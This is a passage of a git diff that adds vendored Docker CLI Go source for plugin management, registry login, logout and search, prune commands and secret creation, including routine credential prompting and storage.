pluginOptions, cmdName string) (types.PluginInstallOptions, error) { + // Parse name using distribution reference package to support name + // containing both tag and digest. Names with both tag and digest + // will be treated by the daemon as a pull by digest with + // an alias for the tag (if no alias is provided). + ref, err := distreference.ParseNamed(opts.remote) + if err != nil { + return types.PluginInstallOptions{}, err + } + + index, err := getRepoIndexFromUnnormalizedRef(ref) + if err != nil { + return types.PluginInstallOptions{}, err + } + + repoInfoIndex, err := getRepoIndexFromUnnormalizedRef(ref) + if err != nil { + return types.PluginInstallOptions{}, err + } + remote := ref.String() + + _, isCanonical := ref.(distreference.Canonical) + if command.IsTrusted() && !isCanonical { + var nt reference.NamedTagged + named, err := reference.ParseNamed(ref.Name()) + if err != nil { + return types.PluginInstallOptions{}, err + } + if tagged, ok := ref.(distreference.Tagged); ok { + nt, err = reference.WithTag(named, tagged.Tag()) + if err != nil { + return types.PluginInstallOptions{}, err + } + } else { + named = reference.WithDefaultTag(named) + nt = named.(reference.NamedTagged) + } + + ctx := context.Background() + trusted, err := image.TrustedReference(ctx, dockerCli, nt, newRegistryService()) + if err != nil { + return types.PluginInstallOptions{}, err + } + remote = trusted.String() + } + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, index) + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return types.PluginInstallOptions{}, err + } + + registryAuthFunc := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfoIndex, cmdName) + + options := types.PluginInstallOptions{ + RegistryAuth: encodedAuth, + RemoteRef: remote, + Disabled: opts.disable, + AcceptAllPermissions: opts.grantPerms, + AcceptPermissionsFunc: acceptPrivileges(dockerCli, opts.remote), + // TODO: Rename PrivilegeFunc, it has nothing to do with privileges + PrivilegeFunc: registryAuthFunc, + Args: opts.args, + } + return options, nil +} + +func runInstall(dockerCli *command.DockerCli, opts pluginOptions) error { + var localName string + if opts.localName != "" { + aref, err := reference.ParseNamed(opts.localName) + if err != nil { + return err + } + aref = reference.WithDefaultTag(aref) + if _, ok := aref.(reference.NamedTagged); !ok { + return fmt.Errorf("invalid name: %s", opts.localName) + } + localName = aref.String() + } + + ctx := context.Background() + options, err := buildPullConfig(ctx, dockerCli, opts, "plugin install") + if err != nil { + return err + } + responseBody, err := dockerCli.Client().PluginInstall(ctx, localName, options) + if err != nil { + if strings.Contains(err.Error(), "target is image") { + return errors.New(err.Error() + " - Use `docker image pull`") + } + return err + } + defer responseBody.Close() + if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "Installed plugin %s\n", opts.remote) // todo: return proper values from the API for this result + return nil +} + +func acceptPrivileges(dockerCli *command.DockerCli, name string) func(privileges types.PluginPrivileges) (bool, error) { + return func(privileges types.PluginPrivileges) (bool, error) { + fmt.Fprintf(dockerCli.Out(), "Plugin %q is requesting the following privileges:\n", name) + for _, privilege := range privileges { + fmt.Fprintf(dockerCli.Out(), " - %s: %v\n", privilege.Name, privilege.Value) + } + + fmt.Fprint(dockerCli.Out(), "Do you grant the above permissions? [y/N] ") + reader := bufio.NewReader(dockerCli.In()) + line, _, err := reader.ReadLine() + if err != nil { + return false, err + } + return strings.ToLower(string(line)) == "y", nil + } +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/list.go b/vendor/github.com/docker/docker/cli/command/plugin/list.go new file mode 100644 index 0000000000..8fd16dae3f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/list.go @@ -0,0 +1,63 @@ +package plugin + +import ( + "fmt" + "strings" + "text/tabwriter" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type listOptions struct { + noTrunc bool +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts listOptions + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Short: "List plugins", + Aliases: []string{"list"}, + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + plugins, err := dockerCli.Client().PluginList(context.Background()) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + fmt.Fprintf(w, "ID \tNAME \tDESCRIPTION\tENABLED") + fmt.Fprintf(w, "\n") + + for _, p := range plugins { + id := p.ID + desc := strings.Replace(p.Config.Description, "\n", " ", -1) + desc = strings.Replace(desc, "\r", " ", -1) + if !opts.noTrunc { + id = stringid.TruncateID(p.ID) + desc = stringutils.Ellipsis(desc, 45) + } + + fmt.Fprintf(w, "%s\t%s\t%s\t%v\n", id, p.Name, desc, p.Enabled) + } + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/push.go b/vendor/github.com/docker/docker/cli/command/plugin/push.go new file mode 100644 index 0000000000..9abb38ec0b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/push.go @@ -0,0 +1,71 @@ +package plugin + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +func newPushCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "push [OPTIONS] PLUGIN[:TAG]", + Short: "Push a plugin to a registry", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runPush(dockerCli, args[0]) + }, + } + + flags := cmd.Flags() + + command.AddTrustedFlags(flags, true) + + return cmd +} + +func runPush(dockerCli *command.DockerCli, name string) error { + named, err := reference.ParseNamed(name) // FIXME: validate + if err != nil { + return err + } + if reference.IsNameOnly(named) { + named = reference.WithDefaultTag(named) + } + ref, ok := named.(reference.NamedTagged) + if !ok { + return fmt.Errorf("invalid name: %s", named.String()) + } + + ctx := context.Background() + + repoInfo, err := registry.ParseRepositoryInfo(named) + if err != nil { + return err + } + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + responseBody, err := dockerCli.Client().PluginPush(ctx, ref.String(), encodedAuth) + if err != nil { + return err + } + defer responseBody.Close() + + if command.IsTrusted() { + repoInfo.Class = "plugin" + return image.PushTrustedReference(dockerCli, repoInfo, named, authConfig, responseBody) + } + + return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/remove.go b/vendor/github.com/docker/docker/cli/command/plugin/remove.go new file mode 100644 index 0000000000..9f3aba9a01 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/remove.go @@ -0,0 +1,55 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type rmOptions struct { + force bool + + plugins []string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts rmOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] PLUGIN [PLUGIN...]", + Short: "Remove one or more plugins", + Aliases: []string{"remove"}, + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.plugins = args + return runRemove(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of an active plugin") + return cmd +} + +func runRemove(dockerCli *command.DockerCli, opts *rmOptions) error { + ctx := context.Background() + + var errs cli.Errors + for _, name := range opts.plugins { + // TODO: pass names to api instead of making multiple api calls + if err := dockerCli.Client().PluginRemove(ctx, name, types.PluginRemoveOptions{Force: opts.force}); err != nil { + errs = append(errs, err) + continue + } + fmt.Fprintln(dockerCli.Out(), name) + } + // Do not simplify to `return errs` because even if errs == nil, it is not a nil-error interface value. + if errs != nil { + return errs + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/set.go b/vendor/github.com/docker/docker/cli/command/plugin/set.go new file mode 100644 index 0000000000..52b09fb500 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/set.go @@ -0,0 +1,22 @@ +package plugin + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newSetCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "set PLUGIN KEY=VALUE [KEY=VALUE...]", + Short: "Change settings for a plugin", + Args: cli.RequiresMinArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + return dockerCli.Client().PluginSet(context.Background(), args[0], args[1:]) + }, + } + + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go new file mode 100644 index 0000000000..d212cd7e52 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go @@ -0,0 +1,100 @@ +package plugin + +import ( + "bufio" + "context" + "fmt" + "strings" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/pkg/errors" + "github.com/spf13/cobra" +) + +func newUpgradeCommand(dockerCli *command.DockerCli) *cobra.Command { + var options pluginOptions + cmd := &cobra.Command{ + Use: "upgrade [OPTIONS] PLUGIN [REMOTE]", + Short: "Upgrade an existing plugin", + Args: cli.RequiresRangeArgs(1, 2), + RunE: func(cmd *cobra.Command, args []string) error { + options.localName = args[0] + if len(args) == 2 { + options.remote = args[1] + } + return runUpgrade(dockerCli, options) + }, + } + + flags := cmd.Flags() + loadPullFlags(&options, flags) + flags.BoolVar(&options.skipRemoteCheck, "skip-remote-check", false, "Do not check if specified remote plugin matches existing plugin image") + return cmd +} + +func runUpgrade(dockerCli *command.DockerCli, opts pluginOptions) error { + ctx := context.Background() + p, _, err := dockerCli.Client().PluginInspectWithRaw(ctx, opts.localName) + if err != nil { + return fmt.Errorf("error reading plugin data: %v", err) + } + + if p.Enabled { + return fmt.Errorf("the plugin must be disabled before upgrading") + } + + opts.localName = p.Name + if opts.remote == "" { + opts.remote = p.PluginReference + } + remote, err := reference.ParseNamed(opts.remote) + if err != nil { + return errors.Wrap(err, "error parsing remote upgrade image reference") + } + remote = reference.WithDefaultTag(remote) + + old, err := reference.ParseNamed(p.PluginReference) + if err != nil { + return errors.Wrap(err, "error parsing current image reference") + } + old = reference.WithDefaultTag(old) + + fmt.Fprintf(dockerCli.Out(), "Upgrading plugin %s from %s to %s\n", p.Name, old, remote) + if !opts.skipRemoteCheck && remote.String() != old.String() { + _, err := fmt.Fprint(dockerCli.Out(), "Plugin images do not match, are you sure? ") + if err != nil { + return errors.Wrap(err, "error writing to stdout") + } + + rdr := bufio.NewReader(dockerCli.In()) + line, _, err := rdr.ReadLine() + if err != nil { + return errors.Wrap(err, "error reading from stdin") + } + if strings.ToLower(string(line)) != "y" { + return errors.New("canceling upgrade request") + } + } + + options, err := buildPullConfig(ctx, dockerCli, opts, "plugin upgrade") + if err != nil { + return err + } + + responseBody, err := dockerCli.Client().PluginUpgrade(ctx, opts.localName, options) + if err != nil { + if strings.Contains(err.Error(), "target is image") { + return errors.New(err.Error() + " - Use `docker image pull`") + } + return err + } + defer responseBody.Close() + if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "Upgraded plugin %s to %s\n", opts.localName, opts.remote) // todo: return proper values from the API for this result + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/prune/prune.go b/vendor/github.com/docker/docker/cli/command/prune/prune.go new file mode 100644 index 0000000000..a022487fd6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/prune/prune.go @@ -0,0 +1,50 @@ +package prune + +import ( + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/container" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/cli/command/network" + "github.com/docker/docker/cli/command/volume" + "github.com/spf13/cobra" +) + +// NewContainerPruneCommand returns a cobra prune command for containers +func NewContainerPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return container.NewPruneCommand(dockerCli) +} + +// NewVolumePruneCommand returns a cobra prune command for volumes +func NewVolumePruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return volume.NewPruneCommand(dockerCli) +} + +// NewImagePruneCommand returns a cobra prune command for images +func NewImagePruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return image.NewPruneCommand(dockerCli) +} + +// NewNetworkPruneCommand returns a cobra prune command for Networks +func NewNetworkPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return network.NewPruneCommand(dockerCli) +} + +// RunContainerPrune executes a prune command for containers +func RunContainerPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return container.RunPrune(dockerCli) +} + +// RunVolumePrune executes a prune command for volumes +func RunVolumePrune(dockerCli *command.DockerCli) (uint64, string, error) { + return volume.RunPrune(dockerCli) +} + +// RunImagePrune executes a prune command for images +func RunImagePrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { + return image.RunPrune(dockerCli, all) +} + +// RunNetworkPrune executes a prune command for networks +func RunNetworkPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return network.RunPrune(dockerCli) +} diff --git a/vendor/github.com/docker/docker/cli/command/registry.go b/vendor/github.com/docker/docker/cli/command/registry.go new file mode 100644 index 0000000000..65f6b3309e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry.go @@ -0,0 +1,186 @@ +package command + +import ( + "bufio" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "os" + "runtime" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/pkg/term" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" +) + +// ElectAuthServer returns the default registry to use (by asking the daemon) +func ElectAuthServer(ctx context.Context, cli *DockerCli) string { + // The daemon `/info` endpoint informs us of the default registry being + // used. This is essential in cross-platforms environment, where for + // example a Linux client might be interacting with a Windows daemon, hence + // the default registry URL might be Windows specific. + serverAddress := registry.IndexServer + if info, err := cli.Client().Info(ctx); err != nil { + fmt.Fprintf(cli.Out(), "Warning: failed to get default registry endpoint from daemon (%v). Using system default: %s\n", err, serverAddress) + } else { + serverAddress = info.IndexServerAddress + } + return serverAddress +} + +// EncodeAuthToBase64 serializes the auth configuration as JSON base64 payload +func EncodeAuthToBase64(authConfig types.AuthConfig) (string, error) { + buf, err := json.Marshal(authConfig) + if err != nil { + return "", err + } + return base64.URLEncoding.EncodeToString(buf), nil +} + +// RegistryAuthenticationPrivilegedFunc returns a RequestPrivilegeFunc from the specified registry index info +// for the given command. +func RegistryAuthenticationPrivilegedFunc(cli *DockerCli, index *registrytypes.IndexInfo, cmdName string) types.RequestPrivilegeFunc { + return func() (string, error) { + fmt.Fprintf(cli.Out(), "\nPlease login prior to %s:\n", cmdName) + indexServer := registry.GetAuthConfigKey(index) + isDefaultRegistry := indexServer == ElectAuthServer(context.Background(), cli) + authConfig, err := ConfigureAuth(cli, "", "", indexServer, isDefaultRegistry) + if err != nil { + return "", err + } + return EncodeAuthToBase64(authConfig) + } +} + +// ResolveAuthConfig is like registry.ResolveAuthConfig, but if using the +// default index, it uses the default index name for the daemon's platform, +// not the client's platform. +func ResolveAuthConfig(ctx context.Context, cli *DockerCli, index *registrytypes.IndexInfo) types.AuthConfig { + configKey := index.Name + if index.Official { + configKey = ElectAuthServer(ctx, cli) + } + + a, _ := cli.CredentialsStore(configKey).Get(configKey) + return a +} + +// ConfigureAuth returns an AuthConfig from the specified user, password and server. +func ConfigureAuth(cli *DockerCli, flUser, flPassword, serverAddress string, isDefaultRegistry bool) (types.AuthConfig, error) { + // On Windows, force the use of the regular OS stdin stream. Fixes #14336/#14210 + if runtime.GOOS == "windows" { + cli.in = NewInStream(os.Stdin) + } + + if !isDefaultRegistry { + serverAddress = registry.ConvertToHostname(serverAddress) + } + + authconfig, err := cli.CredentialsStore(serverAddress).Get(serverAddress) + if err != nil { + return authconfig, err + } + + // Some links documenting this: + // - https://code.google.com/archive/p/mintty/issues/56 + // - https://github.com/docker/docker/issues/15272 + // - https://mintty.github.io/ (compatibility) + // Linux will hit this if you attempt `cat | docker login`, and Windows + // will hit this if you attempt docker login from mintty where stdin + // is a pipe, not a character based console. + if flPassword == "" && !cli.In().IsTerminal() { + return authconfig, fmt.Errorf("Error: Cannot perform an interactive login from a non TTY device") + } + + authconfig.Username = strings.TrimSpace(authconfig.Username) + + if flUser = strings.TrimSpace(flUser); flUser == "" { + if isDefaultRegistry { + // if this is a default registry (docker hub), then display the following message. + fmt.Fprintln(cli.Out(), "Login with your Docker ID to push and pull images from Docker Hub. If you don't have a Docker ID, head over to https://hub.docker.com to create one.") + } + promptWithDefault(cli.Out(), "Username", authconfig.Username) + flUser = readInput(cli.In(), cli.Out()) + flUser = strings.TrimSpace(flUser) + if flUser == "" { + flUser = authconfig.Username + } + } + if flUser == "" { + return authconfig, fmt.Errorf("Error: Non-null Username Required") + } + if flPassword == "" { + oldState, err := term.SaveState(cli.In().FD()) + if err != nil { + return authconfig, err + } + fmt.Fprintf(cli.Out(), "Password: ") + term.DisableEcho(cli.In().FD(), oldState) + + flPassword = readInput(cli.In(), cli.Out()) + fmt.Fprint(cli.Out(), "\n") + + term.RestoreTerminal(cli.In().FD(), oldState) + if flPassword == "" { + return authconfig, fmt.Errorf("Error: Password Required") + } + } + + authconfig.Username = flUser + authconfig.Password = flPassword + authconfig.ServerAddress = serverAddress + authconfig.IdentityToken = "" + + return authconfig, nil +} + +func readInput(in io.Reader, out io.Writer) string { + reader := bufio.NewReader(in) + line, _, err := reader.ReadLine() + if err != nil { + fmt.Fprintln(out, err.Error()) + os.Exit(1) + } + return string(line) +} + +func promptWithDefault(out io.Writer, prompt string, configDefault string) { + if configDefault == "" { + fmt.Fprintf(out, "%s: ", prompt) + } else { + fmt.Fprintf(out, "%s (%s): ", prompt, configDefault) + } +} + +// RetrieveAuthTokenFromImage retrieves an encoded auth token given a complete image +func RetrieveAuthTokenFromImage(ctx context.Context, cli *DockerCli, image string) (string, error) { + // Retrieve encoded auth token from the image reference + authConfig, err := resolveAuthConfigFromImage(ctx, cli, image) + if err != nil { + return "", err + } + encodedAuth, err := EncodeAuthToBase64(authConfig) + if err != nil { + return "", err + } + return encodedAuth, nil +} + +// resolveAuthConfigFromImage retrieves that AuthConfig using the image string +func resolveAuthConfigFromImage(ctx context.Context, cli *DockerCli, image string) (types.AuthConfig, error) { + registryRef, err := reference.ParseNamed(image) + if err != nil { + return types.AuthConfig{}, err + } + repoInfo, err := registry.ParseRepositoryInfo(registryRef) + if err != nil { + return types.AuthConfig{}, err + } + return ResolveAuthConfig(ctx, cli, repoInfo.Index), nil +} diff --git a/vendor/github.com/docker/docker/cli/command/registry/login.go b/vendor/github.com/docker/docker/cli/command/registry/login.go new file mode 100644 index 0000000000..05b3bb03b2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry/login.go @@ -0,0 +1,85 @@ +package registry + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type loginOptions struct { + serverAddress string + user string + password string + email string +} + +// NewLoginCommand creates a new `docker login` command +func NewLoginCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts loginOptions + + cmd := &cobra.Command{ + Use: "login [OPTIONS] [SERVER]", + Short: "Log in to a Docker registry", + Long: "Log in to a Docker registry.\nIf no server is specified, the default is defined by the daemon.", + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + if len(args) > 0 { + opts.serverAddress = args[0] + } + return runLogin(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.user, "username", "u", "", "Username") + flags.StringVarP(&opts.password, "password", "p", "", "Password") + + // Deprecated in 1.11: Should be removed in docker 1.14 + flags.StringVarP(&opts.email, "email", "e", "", "Email") + flags.MarkDeprecated("email", "will be removed in 1.14.") + + return cmd +} + +func runLogin(dockerCli *command.DockerCli, opts loginOptions) error { + ctx := context.Background() + clnt := dockerCli.Client() + + var ( + serverAddress string + authServer = command.ElectAuthServer(ctx, dockerCli) + ) + if opts.serverAddress != "" { + serverAddress = opts.serverAddress + } else { + serverAddress = authServer + } + + isDefaultRegistry := serverAddress == authServer + + authConfig, err := command.ConfigureAuth(dockerCli, opts.user, opts.password, serverAddress, isDefaultRegistry) + if err != nil { + return err + } + response, err := clnt.RegistryLogin(ctx, authConfig) + if err != nil { + return err + } + if response.IdentityToken != "" { + authConfig.Password = "" + authConfig.IdentityToken = response.IdentityToken + } + if err := dockerCli.CredentialsStore(serverAddress).Store(authConfig); err != nil { + return fmt.Errorf("Error saving credentials: %v", err) + } + + if response.Status != "" { + fmt.Fprintln(dockerCli.Out(), response.Status) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/registry/logout.go b/vendor/github.com/docker/docker/cli/command/registry/logout.go new file mode 100644 index 0000000000..877e60e8cc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry/logout.go @@ -0,0 +1,77 @@ +package registry + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +// NewLogoutCommand creates a new `docker login` command +func NewLogoutCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "logout [SERVER]", + Short: "Log out from a Docker registry", + Long: "Log out from a Docker registry.\nIf no server is specified, the default is defined by the daemon.", + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + var serverAddress string + if len(args) > 0 { + serverAddress = args[0] + } + return runLogout(dockerCli, serverAddress) + }, + } + + return cmd +} + +func runLogout(dockerCli *command.DockerCli, serverAddress string) error { + ctx := context.Background() + var isDefaultRegistry bool + + if serverAddress == "" { + serverAddress = command.ElectAuthServer(ctx, dockerCli) + isDefaultRegistry = true + } + + var ( + loggedIn bool + regsToLogout []string + hostnameAddress = serverAddress + regsToTry = []string{serverAddress} + ) + if !isDefaultRegistry { + hostnameAddress = registry.ConvertToHostname(serverAddress) + // the tries below are kept for backward compatibility where a user could have + // saved the registry in one of the following format. + regsToTry = append(regsToTry, hostnameAddress, "http://"+hostnameAddress, "https://"+hostnameAddress) + } + + // check if we're logged in based on the records in the config file + // which means it couldn't have user/pass cause they may be in the creds store + for _, s := range regsToTry { + if _, ok := dockerCli.ConfigFile().AuthConfigs[s]; ok { + loggedIn = true + regsToLogout = append(regsToLogout, s) + } + } + + if !loggedIn { + fmt.Fprintf(dockerCli.Out(), "Not logged in to %s\n", hostnameAddress) + return nil + } + + fmt.Fprintf(dockerCli.Out(), "Removing login credentials for %s\n", hostnameAddress) + for _, r := range regsToLogout { + if err := dockerCli.CredentialsStore(r).Erase(r); err != nil { + fmt.Fprintf(dockerCli.Err(), "WARNING: could not erase credentials: %v\n", err) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/registry/search.go b/vendor/github.com/docker/docker/cli/command/registry/search.go new file mode 100644 index 0000000000..124b4ae6cc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry/search.go @@ -0,0 +1,126 @@ +package registry + +import ( + "fmt" + "sort" + "strings" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +type searchOptions struct { + term string + noTrunc bool + limit int + filter opts.FilterOpt + + // Deprecated + stars uint + automated bool +} + +// NewSearchCommand creates a new `docker search` command +func NewSearchCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := searchOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "search [OPTIONS] TERM", + Short: "Search the Docker Hub for images", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.term = args[0] + return runSearch(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + flags.IntVar(&opts.limit, "limit", registry.DefaultSearchLimit, "Max number of search results") + + flags.BoolVar(&opts.automated, "automated", false, "Only show automated builds") + flags.UintVarP(&opts.stars, "stars", "s", 0, "Only displays with at least x stars") + + flags.MarkDeprecated("automated", "use --filter=automated=true instead") + flags.MarkDeprecated("stars", "use --filter=stars=3 instead") + + return cmd +} + +func runSearch(dockerCli *command.DockerCli, opts searchOptions) error { + indexInfo, err := registry.ParseSearchIndexInfo(opts.term) + if err != nil { + return err + } + + ctx := context.Background() + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, indexInfo) + requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, indexInfo, "search") + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + + options := types.ImageSearchOptions{ + RegistryAuth: encodedAuth, + PrivilegeFunc: requestPrivilege, + Filters: opts.filter.Value(), + Limit: opts.limit, + } + + clnt := dockerCli.Client() + + unorderedResults, err := clnt.ImageSearch(ctx, opts.term, options) + if err != nil { + return err + } + + results := searchResultsByStars(unorderedResults) + sort.Sort(results) + + w := tabwriter.NewWriter(dockerCli.Out(), 10, 1, 3, ' ', 0) + fmt.Fprintf(w, "NAME\tDESCRIPTION\tSTARS\tOFFICIAL\tAUTOMATED\n") + for _, res := range results { + // --automated and -s, --stars are deprecated since Docker 1.12 + if (opts.automated && !res.IsAutomated) || (int(opts.stars) > res.StarCount) { + continue + } + desc := strings.Replace(res.Description, "\n", " ", -1) + desc = strings.Replace(desc, "\r", " ", -1) + if !opts.noTrunc { + desc = stringutils.Ellipsis(desc, 45) + } + fmt.Fprintf(w, "%s\t%s\t%d\t", res.Name, desc, res.StarCount) + if res.IsOfficial { + fmt.Fprint(w, "[OK]") + + } + fmt.Fprint(w, "\t") + if res.IsAutomated { + fmt.Fprint(w, "[OK]") + } + fmt.Fprint(w, "\n") + } + w.Flush() + return nil +} + +// SearchResultsByStars sorts search results in descending order by number of stars. +type searchResultsByStars []registrytypes.SearchResult + +func (r searchResultsByStars) Len() int { return len(r) } +func (r searchResultsByStars) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r searchResultsByStars) Less(i, j int) bool { return r[j].StarCount < r[i].StarCount } diff --git a/vendor/github.com/docker/docker/cli/command/secret/cmd.go b/vendor/github.com/docker/docker/cli/command/secret/cmd.go new file mode 100644 index 0000000000..79e669858c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/cmd.go @@ -0,0 +1,25 @@ +package secret + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewSecretCommand returns a cobra command for `secret` subcommands +func NewSecretCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "secret", + Short: "Manage Docker secrets", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newSecretListCommand(dockerCli), + newSecretCreateCommand(dockerCli), + newSecretInspectCommand(dockerCli), + newSecretRemoveCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/create.go b/vendor/github.com/docker/docker/cli/command/secret/create.go new file mode 100644 index 0000000000..f4683a60f5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/create.go @@ -0,0 +1,79 @@ +package secret + +import ( + "fmt" + "io" + "io/ioutil" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/system" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type createOptions struct { + name string + file string + labels opts.ListOpts +} + +func newSecretCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + createOpts := createOptions{ + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + } + + cmd := &cobra.Command{ + Use: "create [OPTIONS] SECRET file|-", + Short: "Create a secret from a file or STDIN as content", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + createOpts.name = args[0] + createOpts.file = args[1] + return runSecretCreate(dockerCli, createOpts) + }, + } + flags := cmd.Flags() + flags.VarP(&createOpts.labels, "label", "l", "Secret labels") + + return cmd +} + +func runSecretCreate(dockerCli *command.DockerCli, options createOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var in io.Reader = dockerCli.In() + if options.file != "-" { + file, err := system.OpenSequential(options.file) + if err != nil { + return err + } + in = file + defer file.Close() + } + + secretData, err := ioutil.ReadAll(in) + if err != nil { + return fmt.Errorf("Error reading content from %q: %v", options.file, err) + } + + spec := swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: options.name, + Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), + }, + Data: secretData, + } + + r, err := client.SecretCreate(ctx, spec) + if 